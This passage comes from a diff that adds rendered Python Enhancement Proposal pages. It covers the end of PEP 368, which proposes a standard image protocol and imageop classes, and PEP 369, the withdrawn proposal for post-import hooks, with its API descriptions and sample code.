A good way to have high quality modules ready for inclusion in the +Python standard library is to simply wait for natural selection among +competing external libraries to provide a clear winner with useful +functionality and a big user base. Then the de facto standard can be +officially sanctioned by including it in the standard library.

+

Unfortunately this approach hasn’t worked well for the creation of a +dominant image class in the Python world: almost every third-party +library that requires an image object creates its own class +incompatible with the ones from other libraries. This is a real +problem because it’s entirely reasonable for a program to create and +manipulate an image using, e.g., PIL (the Python Imaging Library) and +then display it using wxPython or pygame. But these libraries have +different and incompatible image classes, and the usual solution is to +manually “export” an image from the source to a (width, height, +bytes_string) tuple and “import” it creating a new instance in the +target format. This approach works, but is both uglier and slower +than it needs to be.

+

Another “solution” that has sometimes been used is the creation of specific adapters and/or converters from one class to another (e.g. PIL offers the ImageTk module for converting PIL images to a class compatible with the Tkinter one). But this approach doesn’t scale well with the number of libraries involved, and it’s still annoying for the user: if I have a perfectly good image object, why should I convert it before passing it to the next method, and why can’t that method simply accept my image as-is?

+

The problem isn’t by any stretch limited to the three mentioned libraries and probably has multiple causes, including two that IMO are very important to understand before solving it:

+
    +
  • in today’s computing world an image is a basic type not strictly +tied to a specific domain. This is why there will never be a clear +winner between the image classes from the three libraries mentioned +above (PIL, wxPython and pygame): they cover different domains and +don’t really compete with each other;
  • +
  • the Python standard library has never provided a good image class that can be adopted or imitated by third-party modules. Tkinter.PhotoImage provides basic RGB functionality, but it’s by far the slowest and ugliest of the bunch and it can be instantiated only after the Tkinter root window has been created.
  • +
+

This PEP tries to improve this situation in four ways:

+
    +
  1. It defines a simple and pythonic image protocol/interface (both on +the Python and the C side) that can be hopefully accepted and +implemented by existing image classes inside and outside the +standard library without breaking backward compatibility with +their existing user bases.
  2. +
  3. It proposes the inclusion in the standard library of three new +classes:
      +
    • ImageMixin provides almost everything necessary to implement the new protocol; its main purpose is to make it as simple as possible for existing libraries to support this interface, in some cases as simply as adding it to the list of base classes and making minor additions to the constructor.
    • +
    • Image is a subclass of ImageMixin and will add a +constructor that can resize and/or convert an image between +different pixel formats. This is intended to provide a fast and +efficient default implementation of the new protocol.
    • +
    • ImageSize is a minor helper class. See below for details.
    • +
    +
  4. +
  5. Tkinter.PhotoImage will implement the new protocol (mostly through the ImageMixin class) and all the Tkinter methods that can receive an image will be modified to accept any object that implements the interface. As an aside, the author of this PEP will collaborate with the developers of the most common external libraries to achieve the same goal (supporting the protocol in their classes and accepting any class that implements it).
  6. +
  7. New PyImage_* functions will be added to the CPython C API: +they implement the C side of the protocol and accept as first +parameter any object that supports it, even if it isn’t an +instance of the Image/ImageMixin classes.
  8. +
+

The main effects for the end user will be a simplification of the +interchange of images between different libraries (if everything goes +well, any Python library will accept images from any other library) +and the out-of-the-box availability of the new Image class. The +new class is intended to cover simple but common use cases like +cropping and/or resizing a photograph to the desired size and passing +it an appropriate widget for displaying it on a window, or darkening a +texture and passing it to a 3D library.

+

The Image class is not intended to replace or compete with PIL, +Pythonmagick or NumPy, even if it provides a (very small) subset of +the functionality of these three libraries. In particular PIL offers +very rich image manipulation features with dozens of classes, +filters, transformations and file formats. The inclusion of PIL (or +something similar) in the standard library may, or may not, be a +worthy goal but it’s completely outside the scope of this PEP.

+
+
+

Specification

+

The imageop module is used as the default location for the new classes and objects because it has for a long time hosted functions that provided somewhat similar functionality, but a new module may be created if preferred (e.g. a new “image” or “media” module; the latter may eventually include other multimedia classes).

+

MODES is a new module level constant: it is a set of the pixel +formats supported by the Image class. Any image object that +implements the new protocol is guaranteed to be formatted in one of +these modes, but libraries that accept images are allowed to support +only a subset of them.

+

These modes are in turn also available as module level constants (e.g. +imageop.RGB).

+

The following table is a summary of the modes currently supported and +their properties:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameComponent +namesBits per +componentSubsamplingValid +intervals
Ll (lowercase L)8nofull range
L16l16nofull range
L32l32nofull range
LAl, a8nofull range
LA32l, a16nofull range
RGBr, g, b8nofull range
RGB48r, g, b16nofull range
RGBAr, g, b, a8nofull range
RGBA64r, g, b, a16nofull range
YV12y, cr, cb81, 2, 216-235, 16-240, 16-240
JPEG_YV12y, cr, cb81, 2, 2full range
CMYKc, m, y, k8nofull range
CMYK64c, m, y, k16nofull range
+

When the name of a mode ends with a number, it represents the average +number of bits per pixel. All the other modes simply use a byte per +component per pixel.

+

No palette modes or modes with less than 8 bits per component are +supported. Welcome to the 21st century.

+

Here’s a quick description of the modes and the rationale for their +inclusion; there are four groups of modes:

+
    +
  1. grayscale (L* modes): they are heavily used in scientific +computing (those people may also need a very high dynamic range and +precision, hence L32, the only mode with 32 bits per component) +and sometimes it can be useful to consider a single component of a +color image as a grayscale image (this is used by the individual +planes of the planar images, see YV12 below); the name of the +component ('l', lowercase letter L) stands for luminance, the +second optional component ('a') is the alpha value and +represents the opacity of the pixels: alpha = 0 means full +transparency, alpha = 255/65535 represents a fully opaque pixel;
  2. +
  3. RGB* modes: the garden variety color images. The optional +alpha component has the same meaning as in grayscale modes;
  4. +
  5. YCbCr, a.k.a. YUV (*YV12 modes). These modes are planar +(i.e. the values of all the pixel for each component are stored in +a consecutive memory area, instead of the usual arrangement where +all the components of a pixel reside in consecutive bytes) and use +a 1, 2, 2 (a.k.a. 4:2:0) subsampling (i.e. each pixel has its own Y +value, but the Cb and Cr components are shared between groups of +2x2 adjacent pixels) because this is the format that’s by far the +most common for YCbCr images. Please note that the V (Cr) plane is +stored before the U (Cb) plane.

    YV12 is commonly used for MPEG2 (including DVDs), MPEG4 (both ASP/DivX and AVC/H.264) and Theora video frames. Valid values for Y are in range(16, 236) (that is, 16 to 235 inclusive), and valid values for Cb and Cr are in range(16, 241). JPEG_YV12 is similar to YV12, but the three components can have the full range of 256 values. It’s the native format used by almost all JPEG/JFIF files and by MJPEG video frames. The “strangeness” of these two with respect to all the other supported modes derives from the fact that they are widely used that way by a lot of existing libraries and applications; this is also the reason why they are included (together with the fact that they can’t be losslessly converted to RGB, because YCbCr is a bigger color space); the funny 4:2:0 planar arrangement of the pixel values is relatively easy to support because in most cases the three planes can be considered three separate grayscale images;

    +
  6. +
  7. CMYK* modes (cyan, magenta, yellow and black) are subtractive +color modes, used for printing color images on dead trees. +Professional designers love to pretend that they can’t live without +them, so here they are.
  8. +
+
+

Python API

+

See the examples below.

+

In Python 2.x, all the new classes defined here are new-style classes.

+
+

Mode Objects

+

The mode objects offer a number of attributes and methods that can be +used for implementing generic algorithms that work on different types +of images:

+

components

+
+
The number of components per pixel (e.g. 4 for an RGBA image).
+

component_names

+
+
A tuple of strings; see the column “Component names” in the above +table.
+

bits_per_component

+
+
8, 16 or 32; see “Bits per component” in the above table.
+

bytes_per_pixel

+
+
components * bits_per_component // 8, only available for non +planar modes (see below).
+

planar

+
+
Boolean; True if the image components each reside in a separate plane. Currently this happens if and only if the mode uses subsampling.
+

subsampling

+
+
A tuple that for each component in the mode contains a tuple of +two integers that represent the amount of downsampling in the +horizontal and vertical direction, respectively. In practice it’s +((1, 1), (2, 2), (2, 2)) for YV12 and JPEG_YV12 and +((1, 1),) * components for everything else.
+

x_divisor

+
+
max(x for x, y in subsampling); the width of an image that uses this mode must be divisible by this value.
+

y_divisor

+
+
max(y for x, y in subsampling); the height of an image that uses this mode must be divisible by this value.
+

intervals

+
+
A tuple that for each component in the mode contains a tuple of +two integers: the minimum and maximum valid value for the +component. Its value is ((16, 235), (16, 240), (16, 240)) for +YV12 and ((0, 2 ** bits_per_component - 1),) * components +for everything else.
+

get_length(iterable[integer]) -> int

+
+
The parameter must be an iterable that contains two integers: the +width and height of an image; it returns the number of bytes +needed to store an image of these dimensions with this mode.
+

Implementation detail: the modes are instances of a subclass of str and have a value equal to their name (e.g. imageop.RGB == 'RGB'), except for L32, which has the value 'I'. This is only intended for backward compatibility with existing PIL users; new code that uses the image protocol proposed here should not rely on this detail.

+
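
As a sketch of how these attributes combine (hypothetical, since the proposed imageop additions were never implemented):

+
from imageop import RGB, YV12   # hypothetical mode objects
+
+assert RGB.components == 3
+assert RGB.bytes_per_pixel == 3              # 3 components * 8 bits // 8
+assert RGB.get_length((6, 9)) == 6 * 9 * 3   # 162 bytes for a 6x9 image
+
+# YV12 is planar with 4:2:0 subsampling: a full resolution Y plane plus
+# quarter resolution Cr and Cb planes, i.e. 1.5 bytes per pixel overall.
+assert YV12.get_length((4, 4)) == 4 * 4 + 2 * (2 * 2)
+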
+
+

Image Protocol

+

Any object that supports the image protocol must provide the following +methods and attributes:

+

mode

+
+
The format and the arrangement of the pixels in this image; it’s +one of the constants in the MODES set.
+

size

+
+
An instance of the ImageSize class; it’s a named tuple of two +integers: the width and the height of the image in pixels; both of +them must be >= 1 and can also be accessed as the width and +height attributes of size.
+

buffer

+
+
A sequence of integers between 0 and 255; they are the actual +bytes used for storing the image data (i.e. modifying their values +affects the image pixels and vice versa); the data has a +row-major/C-contiguous order without padding and without any +special memory alignment, even when there are more than 8 bits per +component. The only supported methods are __len__, +__getitem__/__setitem__ (with both integers and slice +indexes) and __iter__; on the C side it implements the buffer +protocol.

This is a pretty low level interface to the image and the user is +responsible for using the correct (native) byte order for modes +with more than 8 bit per component and the correct value ranges +for YV12 images. A buffer may or may not keep a reference to +its image, but it’s still safe (if useless) to use the buffer even +after the corresponding image has been destroyed by the garbage +collector (this will require changes to the image class of +wxPython and possibly other libraries). Implementation detail: +this can be an array('B'), a bytes() object or a +specialized fixed-length type.

+
+

info

+
+
A dict object that can contain arbitrary metadata associated +with the image (e.g. DPI, gamma, ICC profile, exposure time…); +the interpretation of this data is beyond the scope of this PEP +and probably depends on the library used to create and/or to save +the image; if a method of the image returns a new image, it can +copy or adapt metadata from its own info attribute (the +ImageMixin implementation always creates a new image with an +empty info dictionary).
+
+
bits_per_component
+
bytes_per_pixel
+
component_names
+
components
+
intervals
+
planar
+
subsampling
+
+
+
Shortcuts for the corresponding mode.* attributes.
+

map(function[, function...]) -> None

+
+
For every pixel in the image, maps each component through the corresponding function. If only one function is passed, it is used repeatedly for each component. This method modifies the image in place and is usually very fast (most of the time the functions are called only a small number of times, possibly only once for simple functions without branches), but it imposes a number of restrictions on the function(s) passed (see the sketch after this list):
    +
  • it must accept a single integer argument and return a number +(map will round the result to the nearest integer and clip +it to range(0, 2 ** bits_per_component), if necessary);
  • +
  • it must not try to intercept any BaseException, +Exception or any unknown subclass of Exception raised by +any operation on the argument (implementations may try to +optimize the speed by passing funny objects, so even a simple +"if n == 10:" may raise an exception: simply ignore it, +map will take care of it); catching any other exception is +fine;
  • +
  • it should be side-effect free and its result should not depend +on values (other than the argument) that may change during a +single invocation of map.
  • +
+
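
A sketch of typical map usage under the proposed API (hypothetical, for illustration only):

+
from imageop import Image, RGB   # hypothetical, as proposed above
+
+img = Image(RGB, (6, 9), color=(10, 20, 30))
+
+# One function for all components: invert the image in place.
+img.map(lambda value: 255 - value)
+assert tuple(img[0, 0]) == (245, 235, 225)
+
+# One function per component: clear red, keep green, invert blue.
+img.map(lambda r: 0, lambda g: g, lambda b: 255 - b)
+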
+
+
rotate90() -> image
+
rotate180() -> image
+
rotate270() -> image
+
+
+
Return a copy of the image rotated 90, 180 or 270 degrees +counterclockwise around its center.
+

clip() -> None

+
+
Saturates invalid component values in YV12 images to the minimum or the maximum allowed (see mode.intervals); for other image modes this method does nothing and it is very fast. Libraries that save/export YV12 images are encouraged to always call this method, since intermediate operations (e.g. the map method) may assign to pixels values outside the valid intervals.
+

split() -> tuple[image]

+
+
Returns a tuple of L, L16 or L32 images corresponding +to the individual components in the image.
+

Planar images also support attributes with the same names defined in component_names: they contain grayscale (mode L) images that offer a view on the pixel values for the corresponding component; any change to the subimages is immediately reflected on the parent image and vice versa (their buffers refer to the same memory location).

+

Non-planar images offer the following additional methods:

+

pixels() -> iterator[pixel]

+
+
Returns an iterator that iterates over all the pixels in the +image, starting from the top line and scanning each line from left +to right. See below for a description of the pixel objects.
+

__iter__() -> iterator[line]

+
+
Returns an iterator that iterates over all the lines in the image, +from top to bottom. See below for a description of the line +objects.
+

__len__() -> int

+
+
Returns the number of lines in the image (size.height).
+

__getitem__(integer) -> line

+
+
Returns the line at the specified (y) position.
+

__getitem__(tuple[integer]) -> pixel

+
+
The parameter must be a tuple of two integers; they are +interpreted respectively as x and y coordinates in the image (0, 0 +is the top left corner) and a pixel object is returned.
+

__getitem__(slice | tuple[integer | slice]) -> image

+
+
The parameter must be a slice or a tuple that contains two slices +or an integer and a slice; the selected area of the image is +copied and a new image is returned; image[x:y:z] is equivalent +to image[:, x:y:z].
+

__setitem__(tuple[integer], integer | iterable[integer]) -> None

+
+
Modifies the pixel at the specified position; image[x, y] = integer is a shortcut for image[x, y] = (integer,) for images with a single component.
+

__setitem__(slice | tuple[integer | slice], image) -> None

+
+
Selects an area in the same way as the corresponding form of the +__getitem__ method and assigns to it a copy of the pixels from +the image in the second argument, that must have exactly the same +mode as this image and the same size as the specified area; the +alpha component, if present, is simply copied and doesn’t affect +the other components of the image (i.e. no alpha compositing is +performed).
+

The mode, size and buffer (including the address in memory +of the buffer) never change after an image is created.

+

It is expected that, if PEP 3118 is accepted, all the image objects +will support the new buffer protocol, however this is beyond the scope +of this PEP.

+
+
+

Image and ImageMixin Classes

+

The ImageMixin class implements all the methods and attributes +described above except mode, size, buffer and info. +Image is a subclass of ImageMixin that adds support for these +four attributes and offers the following constructor (please note that +the constructor is not part of the image protocol):

+

__init__(mode, size, color, source)

+
+
mode must be one of the constants in the MODES set, +size is a sequence of two integers (width and height of the +new image); color is a sequence of integers, one for each +component of the image, used to initialize all the pixels to the +same value; source can be a sequence of integers of the +appropriate size and format that is copied as-is in the buffer of +the new image or an existing image; in Python 2.x source can +also be an instance of str and is interpreted as a sequence of +bytes. color and source are mutually exclusive and if +they are both omitted the image is initialized to transparent +black (all the bytes in the buffer have value 16 in the YV12 +mode, 255 in the CMYK* modes and 0 for everything else). If +source is present and is an image, mode and/or size +can be omitted; if they are specified and are different from the +source mode and/or size, the source image is converted.

The exact algorithms used for resizing and doing color space +conversions may differ between Python versions and +implementations, but they always give high quality results (e.g.: +a cubic spline interpolation can be used for upsampling and an +antialias filter can be used for downsampling images); any +combination of mode conversion is supported, but the algorithm +used for conversions to and from the CMYK* modes is pretty +naïve: if you have the exact color profiles of your devices you +may want to use a good color management tool such as LittleCMS. +The new image has an empty info dict.

+
+
+
+

Line Objects

+

The line objects (returned, e.g., when iterating over an image) +support the following attributes and methods:

+

mode

+
+
The mode of the image from where this line comes.
+

__iter__() -> iterator[pixel]

+
+
Returns an iterator that iterates over all the pixels in the line, +from left to right. See below for a description of the pixel +objects.
+

__len__() -> int

+
+
Returns the number of pixels in the line (the image width).
+

__getitem__(integer) -> pixel

+
+
Returns the pixel at the specified (x) position.
+

__getitem__(slice) -> image

+
+
The selected part of the line is copied and a new image is +returned; the new image will always have height 1.
+

__setitem__(integer, integer | iterable[integer]) -> None

+
+
Modifies the pixel at the specified position; line[x] = +integer is a shortcut for line[x] = (integer,) for images +with a single component.
+

__setitem__(slice, image) -> None

+
+
Selects a part of the line and assigns to it a copy of the pixels +from the image in the second argument, that must have height 1, a +width equal to the specified slice and the same mode as this line; +the alpha component, if present, is simply copied and doesn’t +affect the other components of the image (i.e. no alpha +compositing is performed).
+
+
+

Pixel Objects

+

The pixel objects (returned, e.g., when iterating over a line) support +the following attributes and methods:

+

mode

+
+
The mode of the image from where this pixel comes.
+

value

+
+
A tuple of integers, one for each component. Any iterable of the +correct length can be assigned to value (it will be +automagically converted to a tuple), but you can’t assign to it an +integer, even if the mode has only a single component: use, e.g., +pixel.l = 123 instead.
+

r, g, b, a, l, c, m, y, k

+
+
The integer values of each component; only those applicable for +the current mode (in mode.component_names) will be available.
+
+
__iter__() -> iterator[int]
+
__len__() -> int
+
__getitem__(integer | slice) -> int | tuple[int]
+
__setitem__(integer | slice, integer | iterable[integer]) -> +None
+
+
+
These four methods emulate a fixed length list of integers, one +for each pixel component.
+
+
+

ImageSize Class

+

ImageSize is a named tuple, a class identical to tuple except +that:

+
    +
  • its constructor only accepts two integers, width and height; they +are converted in the constructor using their __index__() +methods, so all the ImageSize objects are guaranteed to contain +only int (or possibly long, in Python 2.x) instances;
  • +
  • it has a width and a height property that are equivalent to +the first and the second number in the tuple, respectively;
  • +
  • the string returned by its __repr__ method is +'imageop.ImageSize(width=%d, height=%d)' % (width, height).
  • +
+

ImageSize is not usually instantiated by end-users, but can be +used when creating a new class that implements the image protocol, +since the size attribute must be an ImageSize instance.

+
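
A sketch of the behaviour described above (hypothetical API):

+
from imageop import ImageSize   # hypothetical, as proposed above
+
+size = ImageSize(640, 480)
+assert size == (640, 480)        # it is still a tuple
+assert size.width == 640 and size.height == 480
+assert repr(size) == 'imageop.ImageSize(width=640, height=480)'
+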
+
+
+

C API

+

The available image modes are visible at the C level as PyImage_* +constants of type PyObject * (e.g.: PyImage_RGB is +imageop.RGB).

+

The following functions offer a C-friendly interface to mode and image +objects (all the functions return NULL or -1 on failure):

+

int PyImageMode_Check(PyObject *obj)

+
+
Returns true if the object obj is a valid image mode.
+
+
int PyImageMode_GetComponents(PyObject *mode)
+
PyObject* PyImageMode_GetComponentNames(PyObject *mode)
+
int PyImageMode_GetBitsPerComponent(PyObject *mode)
+
int PyImageMode_GetBytesPerPixel(PyObject *mode)
+
int PyImageMode_GetPlanar(PyObject *mode)
+
PyObject* PyImageMode_GetSubsampling(PyObject *mode)
+
int PyImageMode_GetXDivisor(PyObject *mode)
+
int PyImageMode_GetYDivisor(PyObject *mode)
+
Py_ssize_t PyImageMode_GetLength(PyObject *mode, Py_ssize_t width, +Py_ssize_t height)
+
+
+
These functions are equivalent to their corresponding Python +attributes or methods.
+

int PyImage_Check(PyObject *obj)

+
+
Returns true if the object obj is an Image object or an +instance of a subtype of the Image type; see also +PyObject_CheckImage below.
+

int PyImage_CheckExact(PyObject *obj)

+
+
Returns true if the object obj is an Image object, but not +an instance of a subtype of the Image type.
+
+
PyObject* PyImage_New(PyObject *mode, Py_ssize_t width, +Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized to transparent black +(see Image.__init__ above for the details).
+
+
PyObject* PyImage_FromImage(PyObject *image, PyObject *mode, +Py_ssize_t width, Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized with the contents of +the image object rescaled and converted to the specified +mode, if necessary.
+
+
PyObject* PyImage_FromBuffer(PyObject *buffer, PyObject *mode, +Py_ssize_t width, +Py_ssize_t height)
+
+
+
Returns a new Image instance, initialized with the contents of +the buffer object.
+

int PyObject_CheckImage(PyObject *obj)

+
+
Returns true if the object obj implements a sufficient subset +of the image protocol to be accepted by the functions defined +below, even if its class is not a subclass of ImageMixin +and/or Image. Currently it simply checks for the existence +and correctness of the attributes mode, size and +buffer.
+
+
PyObject* PyImage_GetMode(PyObject *image)
+
Py_ssize_t PyImage_GetWidth(PyObject *image)
+
Py_ssize_t PyImage_GetHeight(PyObject *image)
+
int PyImage_Clip(PyObject *image)
+
PyObject* PyImage_Split(PyObject *image)
+
PyObject* PyImage_GetBuffer(PyObject *image)
+
int PyImage_AsBuffer(PyObject *image, const void **buffer, +Py_ssize_t *buffer_len)
+
+
+
These functions are equivalent to their corresponding Python attributes or methods; the image memory can be accessed only while holding the GIL and a reference to the image or its buffer, and extra care should be taken for modes with more than 8 bits per component: the data is stored in native byte order and it may not be aligned on 2 or 4 byte boundaries.
+
+
+
+

Examples

+

A few examples of common operations with the new Image class and +protocol:

+
# create a new black RGB image of 6x9 pixels
+rgb_image = imageop.Image(imageop.RGB, (6, 9))
+
+# same as above, but initialize the image to bright red
+rgb_image = imageop.Image(imageop.RGB, (6, 9), color=(255, 0, 0))
+
+# convert the image to YCbCr
+yuv_image = imageop.Image(imageop.JPEG_YV12, source=rgb_image)
+
+# read the value of a pixel and split it into three ints
+r, g, b = rgb_image[x, y]
+
+# modify the magenta component of a pixel in a CMYK image
+cmyk_image[x, y].m = 13
+
+# modify the Y (luma) component of a pixel in a *YV12 image and
+# its corresponding subsampled Cr (red chroma)
+yuv_image.y[x, y] = 42
+yuv_image.cr[x // 2, y // 2] = 54
+
+# iterate over an image
+for line in rgb_image:
+    for pixel in line:
+        # swap red and blue, and set green to 0
+        pixel.value = pixel.b, 0, pixel.r
+
+# find the maximum value of the red component in the image
+max_red = max(pixel.r for pixel in rgb_image.pixels())
+
+# count the number of colors in the image
+num_of_colors = len(set(tuple(pixel) for pixel in image.pixels()))
+
+# copy a block of 4x2 pixels near the upper right corner of an
+# image and paste it into the lower left corner of the same image
+image[:4, -2:] = image[-6:-2, 1:3]
+
+# create a copy of the image, except that the new image can have a
+# different (usually empty) info dict
+new_image = image[:]
+
+# create a mirrored copy of the image, with the left and right
+# sides flipped
+flipped_image = image[::-1, :]
+
+# downsample an image to half its original size using a fast, low
+# quality operation and a slower, high quality one:
+low_quality_image = image[::2, ::2]
+new_size = image.size.width // 2, image.size.height // 2
+high_quality_image = imageop.Image(size=new_size, source=image)
+
+# direct buffer access
+rgb_image[0, 0] = r, g, b
+assert tuple(rgb_image.buffer[:3]) == (r, g, b)
+
+
+
+
+

Backwards Compatibility

+

There are three areas touched by this PEP where backwards +compatibility should be considered:

+
    +
  • Python 2.6: new classes and objects are added to the imageop +module without touching the existing module contents; new methods +and attributes will be added to Tkinter.PhotoImage and its +__getitem__ and __setitem__ methods will be modified to +accept integers, tuples and slices (currently they only accept +strings). All the changes provide a superset of the existing +functionality, so no major compatibility issues are expected.
  • +
  • Python 3.0: the legacy contents of the imageop module will +be deleted, according to PEP 3108; everything defined in this +proposal will work like in Python 2.x with the exception of the +usual 2.x/3.0 differences (e.g. support for long integers and +for interpreting str instances as sequences of bytes will be +dropped).
  • +
  • external libraries: the names and the semantics of the standard +image methods and attributes are carefully chosen to allow some +external libraries that manipulate images (including at least PIL, +wxPython and pygame) to implement the new protocol in their image +classes without breaking compatibility with existing code. The only +blatant conflicts between the image protocol and NumPy arrays are +the value of the size attribute and the coordinates order in the +image[x, y] expression.
  • +
+
+
+

Reference Implementation

+

If this PEP is accepted, the author will provide a reference implementation of the new classes in pure Python (able to run on CPython, PyPy, Jython and IronPython) and a second one optimized for speed, in Python and C, suitable for inclusion in the CPython standard library. The author will also submit the required Tkinter patches. All of the code will be available in a version for Python 2.x and a version for Python 3.0 (it is expected that the two versions will be very similar and that the Python 3.0 one will probably be generated almost completely automatically).

+
+
+

Acknowledgments

+

The implementation of this PEP, if accepted, is sponsored by Google +through the Google Summer of Code program.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0368.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0369/index.html b/pep-0369/index.html new file mode 100644 index 00000000000..e9a6ea37be7 --- /dev/null +++ b/pep-0369/index.html @@ -0,0 +1,401 @@ + + + + + + + + PEP 369 – Post import hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 369 – Post import hooks

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
02-Jan-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
02-Dec-2012
+
+
+
+
Table of Contents +
+
+

Withdrawal Notice

+

This PEP has been withdrawn by its author, as much of the detailed design +is no longer valid following the migration to importlib in Python 3.3.

+
+
+

Abstract

+

This PEP proposes enhancements for the import machinery to add +post import hooks. It is intended primarily to support the wider +use of abstract base classes that is expected in Python 3.0.

+

The PEP originally started as a combined PEP for lazy imports and post import hooks. After some discussion on the python-dev mailing list, the PEP was split into two separate PEPs. [1]

+
+
+

Rationale

+

Python has no API to hook into the import machinery and execute code after a module is successfully loaded. The import hooks of PEP 302 are about finding and loading modules, but they were not designed to act as post import hooks.

+
+
+

Use cases

+

A use case for a post import hook is mentioned in Alyssa (Nick) Coghlan’s initial posting [2] about callbacks on module import. It was found during the development of Python 3.0 and its ABCs. We wanted to register classes like decimal.Decimal with an ABC but the module should not be imported on every interpreter startup. Alyssa came up with this example:

+
@imp.when_imported('decimal')
+def register(decimal):
+    Inexact.register(decimal.Decimal)
+
+
+

The function register is registered as callback for the module named +‘decimal’. When decimal is imported the function is called with the +module object as argument.

+

While this particular example isn’t necessary in practice (as decimal.Decimal will inherit from the appropriate abstract Number base class in 2.6 and 3.0), it still illustrates the principle.

+
+
+

Existing implementations

+

PJE’s peak.util.imports [3] implements post load hooks. My +implementation shares a lot with his and it’s partly based on his ideas.

+
+
+

Post import hook implementation

+

Post import hooks are called after a module has been loaded. The hooks are callables which take one argument, the module instance. They are registered by the dotted name of the module, e.g. ‘os’ or ‘os.path’.

+

The callables are stored in the dict sys.post_import_hooks, which is a mapping from names (as strings) to a list of callables or None.

+
+

States

+
+

No hook was registered

+

sys.post_import_hooks contains no entry for the module

+
+
+

A hook is registered and the module is not loaded yet

+

The import hook registry contains an entry sys.post_import_hooks["name"] = [hook1]

+
+
+

A module is successfully loaded

+

The import machinery checks if sys.post_import_hooks contains post import hooks for the newly loaded module. If hooks are found, they are called in the order they were registered, with the module instance as first argument. The processing of the hooks is stopped when a hook raises an exception. At the end, the entry for the module name is set to None, even when an error has occurred.

+

Additionally the new __notified__ slot of the module object is set to True in order to prevent infinite recursion when the notification method is called inside a hook. For objects which don’t subclass PyModule, a new attribute is added instead.

+
+
+

A module can’t be loaded

+

The import hooks are neither called nor removed from the registry. It +may be possible to load the module later.

+
+
+

A hook is registered but the module is already loaded

+

The hook is fired immediately.

+
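To make the states above concrete, a small sketch of the registration semantics follows. This is illustration only, not the proposed C implementation; it uses a plain module-level dict in place of the real sys.post_import_hooks machinery:

import sys

post_import_hooks = {}

def register_post_import_hook(hook, name):
    # Sketch of the states described above.
    if name in sys.modules:
        # module already loaded: fire the hook immediately
        hook(sys.modules[name])
    else:
        # module not loaded yet: queue the hook under its dotted name
        post_import_hooks.setdefault(name, []).append(hook)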
+
+
+

Invariants

+

The import hook system guarantees certain invariants. XXX

+
+
+

Sample Python implementation

+

A Python implementation may look like:

+
  import sys

  def notify(name):
+      try:
+          module = sys.modules[name]
+      except KeyError:
+          raise ImportError("Module %s has not been imported" % (name,))
+      if module.__notified__:
+          return
+      try:
+          module.__notified__ = True
+          if '.' in name:
+              notify(name[:name.rfind('.')])
+          for callback in post_import_hooks[name]:
+              callback(module)
+      finally:
+          post_import_hooks[name] = None
+
+XXX
+
+
+
+
+

C API

+
+

New C API functions

+
+
PyObject* PyImport_GetPostImportHooks(void)
Returns the dict sys.post_import_hooks or NULL
+
PyObject* PyImport_NotifyLoadedByModule(PyObject *module)
Notify the post import system that a module was requested. Returns a borrowed reference to the same module object, or NULL if an error has occurred. The function calls only the hooks for the module itself and not its parents. The function must be called with the import lock acquired.
+
PyObject* PyImport_NotifyLoadedByName(const char *name)
PyImport_NotifyLoadedByName("a.b.c") calls PyImport_NotifyLoadedByModule() for a, a.b and a.b.c, in that particular order. The modules are retrieved from sys.modules. If a module can’t be retrieved, an exception is raised; otherwise a borrowed reference to the module is returned. The hook calls always start with the prime parent module. The caller of PyImport_NotifyLoadedByName() must hold the import lock!
+
PyObject* PyImport_RegisterPostImportHook(PyObject *callable, PyObject *mod_name)
Register a new hook callable for the module mod_name
+
int PyModule_GetNotified(PyObject *module)
Returns the status of the __notified__ slot / attribute.
+
int PyModule_SetNotified(PyObject *module, int status)
Set the status of the __notified__ slot / attribute.
+
+

The PyImport_NotifyLoadedByModule() method is called inside +import_submodule(). The import system makes sure that the import lock +is acquired and the hooks for the parent modules are already called.

+
+
+
+

Python API

+

The import hook registry and two new API methods are exposed through the sys and imp modules.

+
+
sys.post_import_hooks
The dict contains the post import hooks:
{"name" : [hook1, hook2], ...}
+
+
+
+
imp.register_post_import_hook(hook: "callable", name: str)
Register a new hook hook for the module name
+
imp.notify_module_loaded(module: "module instance") -> module
Notify the system that a module has been loaded. The method is provided +for compatibility with existing lazy / deferred import extensions.
+
module.__notified__
A slot of a module instance. XXX
+
+

The imp module also provides the when_imported function decorator, which is equivalent to:

+
def when_imported(name):
+    def register(hook):
+        register_post_import_hook(hook, name)
+    return register
+
+
+
+
imp.when_imported(name) -> decorator function
for @when_imported(name) def hook(module): pass
+
+
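Putting the pieces together, the intended usage of the proposed imp API would look roughly like this. This is a sketch only; the functions were never added to the standard library, as the PEP was withdrawn:

import imp

@imp.when_imported('json')
def hook(json):
    # runs once, right after the json module is first imported
    print 'json is now available:', json.__name__

# A lazy/deferred import system would hand each freshly loaded module
# back to the hook machinery itself:
# module = imp.notify_module_loaded(module)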
+
+
+

Open issues

+

The when_imported decorator hasn’t been written.

+

The code contains several XXX comments. They are mostly about error +handling in edge cases.

+
+
+

Backwards Compatibility

+

The new features and API don’t conflict with the old import system of Python and don’t cause any backward compatibility issues for most software. However, systems like PEAK and Zope, which implement their own lazy import magic, need to follow some rules.

+

The post import hooks are carefully designed to cooperate with existing deferred and lazy import systems. The PEP author suggests replacing custom on-load hooks with the new hook API. Alternative lazy or deferred imports will still work, but their implementations must call the imp.notify_module_loaded function.

+
+
+

Reference Implementation

+

A reference implementation is already written and is available in the +py3k-importhook branch. [4] It still requires some cleanups, +documentation updates and additional unit tests.

+
+
+

Acknowledgments

+

Alyssa Coghlan, for proof reading and the initial discussion
Phillip J. Eby, for his implementation in PEAK and help with my own implementation

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0369.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
